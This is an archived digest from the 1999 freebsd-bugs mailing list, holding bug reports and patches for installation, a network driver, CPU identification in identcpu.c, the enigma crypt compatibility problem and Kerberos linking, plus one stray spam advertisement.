send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 19 23:20: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9FECF1ADD8 for ; Tue, 19 Oct 1999 23:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA51096; Tue, 19 Oct 1999 23:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 3416E1AD9F; Tue, 19 Oct 1999 23:12:22 -0700 (PDT) Message-Id: <19991020061222.3416E1AD9F@hub.freebsd.org> Date: Tue, 19 Oct 1999 23:12:22 -0700 (PDT) From: reichert@numachi.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14428: can't install from extended DOS partition Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14428 >Category: misc >Synopsis: can't install from extended DOS partition >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Oct 19 23:20:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Brian Reichert >Release: 3.3-RELEASE >Organization: >Environment: >Description: I'm attempting to FreeBSD on a laptop, where Win98 already lives. I shrank the Win98 partition, then used Win98's 'fdisk' to created a 500M extended partition. I successfully formatted this new partition 9again, from Win98), then created a minimal distribution tree as per INSTALL.TXT. Then I try to use this DOS partition to install FreeBSD, sysinstall (as launched from the boot floppies) sys simply: 'Error mounting /dev/wd0s2 on /dist: Invalid argument (22)'. The disk partitioning in sysinstall shows: Offset Size End Name Ptype Desc Subtype Flags 0 63 62 - 6 unused 0 63 2388897 2388959 wd0s1 2 fat 11 2388960 1028160 3417119 wd0s2 4 extended 5 3417120 4747680 8164799 wd0s3 3 freebsd 165 C 8164800 272160 8436959 wd0s4 1 unknown 160 8436960 15120 8452079 - 6 unused 0 >How-To-Repeat: >Fix: Using sysinstall's partition tool, change the extended DOS partition's type to '11' (fat). Win98 will think the FS is gone, you can simply reformat, and reinstall the release tree you want. I was able to successfully install with this method. Oh, and for the record, BottEasy lets you dual-boot easily... >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Oct 20 3: 0: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 38BE71B059 for ; Wed, 20 Oct 1999 03:00:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA71803; Wed, 20 Oct 1999 03:00:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Wed, 20 Oct 1999 03:00:03 -0700 (PDT) Message-Id: <199910201000.DAA71803@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: misc/14412: Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/14412; it has been noted by GNATS. From: Sheldon Hearn To: esquibel@yep.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: misc/14412: Date: Wed, 20 Oct 1999 11:57:00 +0200 On Mon, 18 Oct 1999 23:52:40 MST, Precious_26@nightmail.com wrote: > well i have e-mail at nightmail its not letting me deleat anything and > gave me root to call what can i do e-mail at esquibel@yep.com ok I don't think anyone here understands what you're talking about. :-) If you need help, try to send a more detailed explanation of what you're trying to do and exactly what error messages you're seeing to questions@freebsd.org . Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Oct 20 5:30: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2BCBA1B6E1 for ; Wed, 20 Oct 1999 05:30:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA84312; Wed, 20 Oct 1999 05:30:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 45C821B4CC; Wed, 20 Oct 1999 05:26:43 -0700 (PDT) Message-Id: <19991020122643.45C821B4CC@hub.freebsd.org> Date: Wed, 20 Oct 1999 05:26:43 -0700 (PDT) From: apendleton@vgsinc.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14431: Network Interface Problem Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14431 >Category: misc >Synopsis: Network Interface Problem >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Oct 20 05:30:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Adam Pendleton >Release: 3.2 >Organization: >Environment: FreeBSD webserver-1.fms.belvoir.army.mil 3.2-RELEASE FreeBSD 3.2-RELEASE #0: Tue May 18 04:05:08 GMT 1999 jkh@cathair:/usr/src/sys/compile/GENERIC i386 >Description: I have FreeBSd installed on a Compaq Deskpro 6000 with a DEC Ethernet card. After the computer runs for a while (<20 minutes) and there is steady network traffic, the device seems to shut down. No more traffic can be transmitted to or from the machine. It must remove the de0 device and bring it back up before it works again. I think it might have something to do with the autoselect function, because I have notice some strings in the log files saying that autosense failed. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Oct 20 11:40: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4DC5014CBE for ; Wed, 20 Oct 1999 11:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA94549; Wed, 20 Oct 1999 11:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from kronos.alcnet.com (kronos.alcnet.com [63.69.28.22]) by hub.freebsd.org (Postfix) with ESMTP id E580014CA4 for ; Wed, 20 Oct 1999 11:32:16 -0700 (PDT) (envelope-from kbyanc@kronos.alcnet.com) Received: (from kbyanc@localhost) by kronos.alcnet.com (8.9.3/8.9.3/antispam) id OAA36098; Wed, 20 Oct 1999 14:32:15 -0400 (EDT) Message-Id: <199910201832.OAA36098@kronos.alcnet.com> Date: Wed, 20 Oct 1999 14:32:15 -0400 (EDT) From: kbyanc@posi.net Reply-To: kbyanc@posi.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: i386/14437: MFC'ed identcpu.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14437 >Category: i386 >Synopsis: MFC'ed identcpu.c >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Oct 20 11:40:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Kelly Yancey >Release: FreeBSD 3.2-STABLE i386 >Organization: >Environment: -stable sources cvsuped 10/20/1999 >Description: identcpu.c in -stable is pretty out-of-sync with -current (mainly missing some CPUID bit definitions) Attached is a patch to -stable which (almost) brings it into sync with -current's identcpu.c. Specially, I left 2 sections of code which depended on not building a SMP kernel. I was not sure if the code relied on changes to -current's SMP implemention. >How-To-Repeat: >Fix: --- identcpu.c.orig Wed Oct 20 13:43:39 1999 +++ identcpu.c Wed Oct 20 14:27:09 1999 @@ -79,10 +79,12 @@ u_int cyrix_did; /* Device ID of Cyrix CPU */ int cpu_class = CPUCLASS_386; /* least common denominator */ char machine[] = "i386"; -SYSCTL_STRING(_hw, HW_MACHINE, machine, CTLFLAG_RD, machine, 0, ""); +SYSCTL_STRING(_hw, HW_MACHINE, machine, CTLFLAG_RD, + machine, 0, "Machine class"); static char cpu_model[128]; -SYSCTL_STRING(_hw, HW_MODEL, model, CTLFLAG_RD, cpu_model, 0, ""); +SYSCTL_STRING(_hw, HW_MODEL, model, CTLFLAG_RD, + cpu_model, 0, "Machine model"); static struct cpu_nameclass i386_cpus[] = { { "Intel 80286", CPUCLASS_286 }, /* CPU_286 */ @@ -126,7 +128,7 @@ printcpuinfo(void) { - u_int regs[4], nreg; + u_int regs[4], nreg = 0; cpu_class = i386_cpus[cpu].cpu_class; printf("CPU: "); strncpy(cpu_model, i386_cpus[cpu].cpu_name, sizeof cpu_model); @@ -205,11 +207,11 @@ cpu = CPU_PII; break; case 0x60: - strcat(cpu_model, "Celeron"); + strcat(cpu_model, "Pentium II/Celeron"); cpu = CPU_PII; break; case 0x70: - strcat(cpu_model, "Pentium III"); + strcat(cpu_model, "Pentium III/Xeon"); cpu = CPU_PIII; break; default: @@ -552,32 +550,32 @@ */ printf("\n Features=0x%b", cpu_feature, "\020" - "\001FPU" - "\002VME" + "\001FPU" /* Integral FPU */ + "\002VME" /* Extended VM86 mode support */ "\003DE" - "\004PSE" - "\005TSC" - "\006MSR" - "\007PAE" - "\010MCE" - "\011CX8" - "\012APIC" + "\004PSE" /* 4MByte page tables */ + "\005TSC" /* Timestamp counter */ + "\006MSR" /* Machine specific registers */ + "\007PAE" /* Physical address extension */ + "\010MCE" /* Machine Check support */ + "\011CX8" /* CMPEXCH8 instruction */ + "\012APIC" /* SMP local APIC */ "\013oldMTRR" "\014SEP" "\015MTRR" - "\016PGE" + "\016PGE" /* PG_G (global bit) support */ "\017MCA" - "\020CMOV" - "\021PAT" - "\022PSE36" - "\023" + "\020CMOV" /* CMOV instruction */ + "\021PAT" /* Page attributes table */ + "\022PSE36" /* 36 bit address space support */ + "\023PN" /* Processor Serial number */ "\024" "\025" "\026" "\027" - "\030MMX" - "\031FXSR" - "\032" + "\030MMX" /* MMX instructions */ + "\031FXSR" /* FXSAVE/FXRSTOR */ + "\032XMM" /* Katami SIMD/MMX2 instructions */ "\033" "\034" "\035" @@ -663,6 +661,7 @@ (" .text .p2align 2,0x90 + .type " __XSTRING(CNAME(bluetrap6)) ",@function " __XSTRING(CNAME(bluetrap6)) ": ss movl $0xa8c1d," __XSTRING(CNAME(trap_by_rdmsr)) " @@ -679,6 +678,7 @@ (" .text .p2align 2,0x90 + .type " __XSTRING(CNAME(bluetrap13)) ",@function " __XSTRING(CNAME(bluetrap13)) ": ss movl $0xa89c4," __XSTRING(CNAME(trap_by_rdmsr)) " >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Oct 20 11:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6CE4114A14 for ; Wed, 20 Oct 1999 11:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA96222; Wed, 20 Oct 1999 11:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from kronos.alcnet.com (kronos.alcnet.com [63.69.28.22]) by hub.freebsd.org (Postfix) with ESMTP id 3208914CB9 for ; Wed, 20 Oct 1999 11:46:00 -0700 (PDT) (envelope-from kbyanc@kronos.alcnet.com) Received: (from kbyanc@localhost) by kronos.alcnet.com (8.9.3/8.9.3/antispam) id OAA36515; Wed, 20 Oct 1999 14:46:00 -0400 (EDT) Message-Id: <199910201846.OAA36515@kronos.alcnet.com> Date: Wed, 20 Oct 1999 14:46:00 -0400 (EDT) From: kbyanc@posi.net Reply-To: kbyanc@posi.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: i386/14438: additional CPUID bit definitions for identcpu.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14438 >Category: i386 >Synopsis: additional CPUID bit definitions for identcpu.c >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Oct 20 11:50:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Kelly Yancey >Release: FreeBSD 3.2-STABLE i386 >Organization: >Environment: Attached patch applies to (from -current): $FreeBSD: src/sys/i386/i386/identcpu.c,v 1.77 1999/10/14 13:59:52 kato Exp $ Also applies to -stable's identcpu.c after applying the patch in i386/14437 >Description: identcpu.c was missing CPUID bit definitions for several AMD extended features. It also mistakingly labeled bit 16 of the AMD features as "FCMOV" when the AMD Processor Recognition datasheet found at WWW: http://www.amd.com/products/cpg/athlon/techdocs/pdf/20734.pdf specifically identifies bit 16 as PAT (same as Pentium features bit 16). >How-To-Repeat: >Fix: --- identcpu.c.orig Wed Oct 20 14:30:39 1999 +++ identcpu.c Wed Oct 20 14:37:24 1999 @@ -566,7 +566,7 @@ "\012APIC" /* SMP local APIC */ "\013oldMTRR" "\014SEP" - "\015MTRR" + "\015MTRR" /* Memory Type Range Registers */ "\016PGE" /* PG_G (global bit) support */ "\017MCA" "\020CMOV" /* CMOV instruction */ @@ -961,40 +961,44 @@ static void print_AMD_features(u_int *regs) { + /* + * Values taken from AMD Processor Recognition + * http://www.amd.com/products/cpg/athlon/techdocs/pdf/20734.pdf + */ do_cpuid(0x80000001, regs); printf("\n AMD Features=0x%b", regs[3] &~ cpu_feature, "\020" /* in hex */ - "\001FPU" - "\002VME" - "\003DE" - "\004PSE" - "\005TSC" - "\006MSR" - "\007" - "\010MCE" - "\011CX8" - "\012" + "\001FPU" /* Integral FPU */ + "\002VME" /* Extended VM86 mode support */ + "\003DE" /* Debug extensions */ + "\004PSE" /* 4MByte page tables */ + "\005TSC" /* Timestamp counter */ + "\006MSR" /* Machine specific registers */ + "\007PAE" /* Physical address extension */ + "\010MCE" /* Machine Check support */ + "\011CX8" /* CMPEXCH8 instruction */ + "\012APIC" /* SMP local APIC */ "\013" - "\014SYSCALL" - "\015" - "\016PGE" - "\017" - "\020ICMOV" - "\021FCMOV" - "\022" + "\014SYSCALL" /* SYSENTER/SYSEXIT instructions */ + "\015MTRR" /* Memory Type Range Registers */ + "\016PGE" /* PG_G (global bit) support */ + "\017MCA" /* Machine Check Architecture */ + "\020ICMOV" /* CMOV instruction */ + "\021PAT" /* Page attributes table */ + "\022PGE36" /* 36 bit address space support */ "\023" "\024" "\025" "\026" - "\027" + "\027AMX" /* AMD MMX Extensions */ "\030MMX" - "\031" + "\031FXSAVE" /* FXSAVE/FXRSTOR */ "\032" "\033" "\034" "\035" "\036" - "\037" + "\0373DX" /* 3DNow! Extensions */ "\0403DNow!" ); } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Oct 20 12:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A310314CED for ; Wed, 20 Oct 1999 12:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA03389; Wed, 20 Oct 1999 12:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from kronos.alcnet.com (kronos.alcnet.com [63.69.28.22]) by hub.freebsd.org (Postfix) with ESMTP id 2944614A09 for ; Wed, 20 Oct 1999 12:14:10 -0700 (PDT) (envelope-from kbyanc@kronos.alcnet.com) Received: (from kbyanc@localhost) by kronos.alcnet.com (8.9.3/8.9.3/antispam) id PAA37241; Wed, 20 Oct 1999 15:14:10 -0400 (EDT) Message-Id: <199910201914.PAA37241@kronos.alcnet.com> Date: Wed, 20 Oct 1999 15:14:10 -0400 (EDT) From: kbyanc@posi.net Reply-To: kbyanc@posi.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: i386/14440: update to identcpu.c to "support" AMD K7's Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14440 >Category: i386 >Synopsis: update to identcpu.c to "support" AMD K7's >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Oct 20 12:20:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Kelly Yancey >Release: FreeBSD 3.2-STABLE i386 >Organization: ALC Communications - http://www.alcnet.com/ >Environment: Attached patch applies to (from -current): $FreeBSD: src/sys/i386/i386/identcpu.c,v 1.77 1999/10/14 13:59:52 kato Exp $ Also applies to -stable's identcpu.c after applying the patch in i386/14437 >Description: identcpu.c doesn't appear to check for K7's processor identification. It is rumored to recognize the K7 (I don't know, I don't have one; see http://docs.freebsd.org/cgi/getmsg.cgi?fetch=296945+0+current/freebsd-current) In any event, this is a short patch which I feel confident will do the job (there isn't much to go wrong :) ). Someone with a K7 should check that MTRRs get enabled and maybe write-allocate too. If this patch and i386/14438 are applied, everything about the K7 should be recognized by FreeBSD. >How-To-Repeat: >Fix: --- identcpu.c.orig Wed Oct 20 14:54:43 1999 +++ identcpu.c Wed Oct 20 15:00:00 1999 @@ -299,6 +299,9 @@ case 0x590: strcat(cpu_model, "K6-III"); break; + case 0x610: + strcat(cpu_model, "Athlon"); + break; default: strcat(cpu_model, "Unknown"); break; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Oct 20 18:50:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EF94D14D7F for ; Wed, 20 Oct 1999 18:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA85563; Wed, 20 Oct 1999 18:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from vm.arl.mil (vm.arl.mil [128.63.247.191]) by hub.freebsd.org (Postfix) with ESMTP id C9FAF14E4F for ; Wed, 20 Oct 1999 18:41:53 -0700 (PDT) (envelope-from mike@vm.arl.mil) Received: (from mike@localhost) by vm.arl.mil (8.9.3/8.9.3) id VAA90833; Wed, 20 Oct 1999 21:39:57 -0400 (EDT) (envelope-from mike) Message-Id: <199910210139.VAA90833@vm.arl.mil> Date: Wed, 20 Oct 1999 21:39:57 -0400 (EDT) From: mike@arl.mil Reply-To: mike@arl.mil To: FreeBSD-gnats-submit@freebsd.org, mike@arl.mil X-Send-Pr-Version: 3.2 Subject: bin/14444: enigma command can't decrypt files encrypted on other UNIX systems Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14444 >Category: bin >Synopsis: enigma command can't decrypt files encrypted on other UNIX systems >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Oct 20 18:50:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Mike Muuss >Release: FreeBSD 3.2-RELEASE i386 >Organization: ARL >Environment: This problem can apply to enigma on all FreeBSD platforms. >Description: 1) The 'enigma' program uses the /usr/libexec/makekey program to generate the key with which the Enigma machine is started. It has been modified to call the crypt(3) library routine directly, to simplify porting. (This is more of an issue for other OSs that we use this program on). 2) If the MD5 version of crypt(3) has been installed (the default for FreeBSD 3.x systems), the enigma program will not be able to decode files encrypted on other UNIX systems, nor will files encrypted on FreeBSD be able to be decrypted on other UNIX systems. As the only real point of having the enigma command around at all is to permit reading of old encrypted files, this defeats its purpose. I have added self-checking into the enigma source, so that if the crypt(3) routine is not functioning in a backwards-compatible manner, it will complain and abort. >How-To-Repeat: On FreeBSD, this (incorrect) output is produced: echo testing | enigma glorp | hd 00000000 20 e9 04 27 8e 38 8c 15 | ..'.8..| On correctly operating UNIX systems, this is the output produced: echo testing | crypt glorp | hd 00000000 bf f7 35 2b fc 49 fa 22 |..5+.I."| I verified these correct results on three systems: my reference VAX-11/780 running 4.3 BSD, an SGI Origin-200 running IRIX64 release 6.4, and a RedHat Linux 6.0 running on a Dell Dimension XPS-R400 Pentium. >Fix: *** /p/ftp/pub/FreeBSD/FreeBSD-current/src/usr.bin/enigma/enigma.c Fri Oct 30 10:24:00 1998 --- enigma.c Wed Oct 20 19:49:28 1999 *************** *** 8,18 **** * A public-domain replacement for the UNIX "crypt" command. * * Upgraded to function properly on 64-bit machines. */ - #include - #include - #include #include #include --- 8,19 ---- * A public-domain replacement for the UNIX "crypt" command. * * Upgraded to function properly on 64-bit machines. + * + * Upgraded to have inline "makekey", and to test for + * backwards-compatible operation of crypt(), rather than MD5 version. + * crypt() is often found in -lcrypt */ #include #include #include *************** *** 35,76 **** setup(pw) char *pw; { ! int ic, i, k, temp, pf[2], pid; unsigned random; long seed; strncpy(buf, pw, 8); while (*pw) *pw++ = '\0'; ! buf[8] = buf[0]; ! buf[9] = buf[1]; ! pipe(pf); ! if ((pid=fork())==0) { ! close(0); ! close(1); ! dup(pf[0]); ! dup(pf[1]); ! execlp("makekey", "-", 0); ! execl("/usr/libexec/makekey", "-", 0); /* BSDI */ ! execl("/usr/lib/makekey", "-", 0); ! execl("/usr/bin/makekey", "-", 0); /* IBM */ ! execl("/lib/makekey", "-", 0); ! perror("makekey"); ! fprintf(stderr, "enigma: cannot execute 'makekey', aborting\n"); ! exit(1); ! } ! write(pf[1], buf, 10); ! close(pf[1]); ! i=wait((int *)NULL); ! if (i<0) perror("enigma: wait"); ! if (i!=pid) { ! fprintf(stderr, "enigma: expected pid %d, got pid %d\n", pid, i); ! exit(1); ! } ! if ((i=read(pf[0], buf, 13)) != 13) { ! fprintf(stderr, "enigma: cannot generate key, read %d\n",i); ! exit(1); ! } seed = 123; for (i=0; i<13; i++) seed = seed*buf[i] + i; --- 36,70 ---- setup(pw) char *pw; { ! int ic, i, k, temp; unsigned random; long seed; + char *r; + char salt[3]; + + /* Verify backwards-compatible operation of library routine crypt() */ + r = crypt("glorp", "gl"); + if( strncmp( r, "$1$gl$85n.KNI", 13 ) == 0 ) { + fprintf(stderr, "enigma: crypt() library routine is using MD5 rather than DES.\n%s\n", + "Incompatible encryption would occur, aborting."); + exit(1); + } + if( strcmp( r, "gl4EsjmGvYQE." ) != 0 ) { + fprintf(stderr, "enigma: malfunction in crypt() library routine, aborting.\n"); + exit(1); + } + /* Don't exec makekey, just invoke library routine directly */ strncpy(buf, pw, 8); while (*pw) *pw++ = '\0'; ! buf[8] = '\0'; ! salt[0] = buf[0]; ! salt[1] = buf[1]; ! salt[2] = '\0'; ! r = crypt( buf, salt ); ! strncpy( buf, r, sizeof(buf) ); ! seed = 123; for (i=0; i<13; i++) seed = seed*buf[i] + i; END >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Oct 20 20:19: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from adcom.adcomsys.net (adcom.adcomsys.net [209.63.29.2]) by hub.freebsd.org (Postfix) with ESMTP id 585E514D21; Wed, 20 Oct 1999 20:19:06 -0700 (PDT) (envelope-from mikep@adcomsys.net) Received: from mike ([209.63.29.125] (may be forged)) by adcom.adcomsys.net (2.6 Build 1 (Berkeley 8.8.6)/8.8.4) with SMTP id TAA00533; Wed, 20 Oct 1999 19:58:06 -0700 Message-Id: <199910210258.TAA00533@adcom.adcomsys.net> Comments: Authenticated sender is From: "Mike Petragallo" To: RANGE.OF.MOTION.BREAKTHROUGH!!!@adcom.adcomsys.net Date: Wed, 20 Oct 1999 19:07:06 +0000 X-Distribution: Bulk MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: NEW Diagnostic Range of Motion Device X-mailer: Pegasus Mail for Windows (v2.52) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org IF YOU DO PATIENT EXAMS YOU NEED THIS NOW!!! New Range Of Motion system with more versatility than equipment costing $900.00 - $1000.00 for under $200.00 ONLY 1/5 their costs!!!!! Measures VERTICAL and HORIZONTAL "Body and Extremity" R.O.M. movements. Great for X-Ray - angle and curve analysis Eliminates examiner and patient testing errors via failsafe testing design. SATISFACTION GUARANTEED!!!!! Tested in schools & clinics since 1991 and used throughout the US and foreign countries For more info and / or introductory discount, reply ONLY by phone to (425) 821-3459 SINGLE PURCHASE and DEALER INQUIRIES WELCOME - Wholesale prices available on bulk orders. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Oct 21 5:28:38 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from hq.seicom.net (hq.seicom.net [194.97.200.30]) by hub.freebsd.org (Postfix) with ESMTP id 951A114E6C; Thu, 21 Oct 1999 05:28:12 -0700 (PDT) (envelope-from ob@seicom.net) Received: from seicom.net by hq.seicom.net (8.9.3/8.9.3) with ESMTP id OAA25457; Thu, 21 Oct 1999 14:28:07 +0200 (CEST) Message-ID: <380F06D6.BFD83C98@seicom.net> Date: Thu, 21 Oct 1999 14:28:06 +0200 From: Oliver Breuninger X-Mailer: Mozilla 4.61 [en] (X11; I; FreeBSD 3.3-RELEASE i386) X-Accept-Language: de-DE, en MIME-Version: 1.0 To: hm@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/13841: ISDN i4b does not hang up References: <199910181437.HAA74223@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, it's possible that this fix isn't the right way, but what should users do who use freebsd and i4b with isdn costs of thousends of dollars ? regards Oliver hm@FreeBSD.org wrote: > > Synopsis: ISDN i4b does not hang up > > State-Changed-From-To: open->suspended > State-Changed-By: hm > State-Changed-When: Mon Oct 18 07:32:00 PDT 1999 > State-Changed-Why: > This fix is part of the i4b distribution since 05/99 and has not been > integrated into i4b because of a drawback in the very first connection > handling when thisis patch was applied. > According to some testers from the i4b development this patch in its > current form is not the right way to solve the problem. > > Responsible-Changed-From-To: freebsd-bugs->hm > Responsible-Changed-By: hm > Responsible-Changed-When: Mon Oct 18 07:32:00 PDT 1999 > Responsible-Changed-Why: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Oct 21 8:12:41 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id D505514D01 for ; Thu, 21 Oct 1999 08:12:37 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id LAA47642; Thu, 21 Oct 1999 11:12:30 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 21 Oct 1999 11:12:30 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Garrett Wollman Cc: bugs@FreeBSD.ORG Subject: Re: 3.3-RC: kerberos pam module missing? In-Reply-To: <199909150127.VAA39626@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I guess this never made it into FreeBSD 3.3-RELEASE CD version as I just installed a 3.3 machine with Kerberos and sure enough the PAM library isn't there. Doh. :-( Hopefully we can get it onto the next release CD? Rebuilding world, or at least a decent part of it, just to be able to log in using K4 is not exactly my idea of great fun :-). I suppose I had to do it on this machine sometime anyway, as I'm planning to hack it up with ACL support :-). Robert Watson On Tue, 14 Sep 1999, Garrett Wollman wrote: > < said: > > > I installed the kerberos distribution, enabled K4 login in > > /etc/pam.conf--however, I now get this: > > markm broke the Kerberos library. Here's a patch: > > Index: Makefile > =================================================================== > RCS file: /home/cvs/src/kerberosIV/lib/libkrb/Makefile,v > retrieving revision 1.5 > diff -u -r1.5 Makefile > --- Makefile 1999/08/28 01:31:19 1.5 > +++ Makefile 1999/09/10 17:06:12 > @@ -7,7 +7,7 @@ > -I${KRB4DIR}/lib/krb \ > -I${KRBOBJDIR} > DPADD+= ${LIBCRYPT} > -LDADD+= -lcrypt > +LDADD+= -lcrypt -lcom_err > SRCS= cr_err_reply.c create_auth_reply.c create_ciph.c \ > create_death_packet.c create_ticket.c dest_tkt.c 